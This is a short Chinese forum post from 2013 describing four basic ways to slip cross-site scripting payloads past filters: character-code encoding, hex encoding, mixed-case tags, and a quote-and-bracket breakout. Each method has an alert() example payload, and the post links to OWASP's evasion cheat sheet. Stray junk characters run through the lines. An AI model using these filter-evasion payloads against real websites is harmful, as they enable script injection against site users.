四种超级基础的绕过方法。
7 k2 P( ?! b$ V3 T# ~5 C1.转换为ASCII码4 k( }( r* H! A
例子:原脚本为<script>alert(‘I love F4ck’)</script >6 S. V0 u& I; N. u0 y
通过转换,变成:
5 ?5 e5 x( ]$ N v0 T<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>, y5 b7 Z- J e1 e
0 x1 R/ p( c; ?0 C2.转换为HEX(十六进制)
; |9 J2 T; w2 `例子:原脚本为<script>alert(‘I love F4ck’)</script>
9 x6 K# O, G4 b( [通过转换,变成:6 y& K. Q9 R7 c/ g$ h/ {
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
5 ~# R6 T# ~/ _! b4 R+ u0 ]; j
" f$ M7 e- o; J+ O; r3.转换脚本的大小写
1 A y: h5 f' T M: M例子:原脚本为<script>alert(‘I love F4ck’)</script>6 k& p( f" d3 H3 p" Y0 h. R1 g
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
) F: t" d' r- a6 f$ x # o. r! _# C& ^, e
4.增加闭合标记”>
) C+ \' A; j" j例子:原脚本为<script>alert(‘I love F4ck’)</script>
' h5 K1 K) f4 [1 F2 [. G' u转换为:”><script>alert(‘I love F4ck’)</script>
3 [6 O" A8 |9 {' ~7 j/ K更详细绕过技术请参考此网页
6 l6 O" S0 F# w& p+ w1 Thttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet8 [3 i4 T0 r: g& ^
' j g, F9 D" }. u: F: b
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对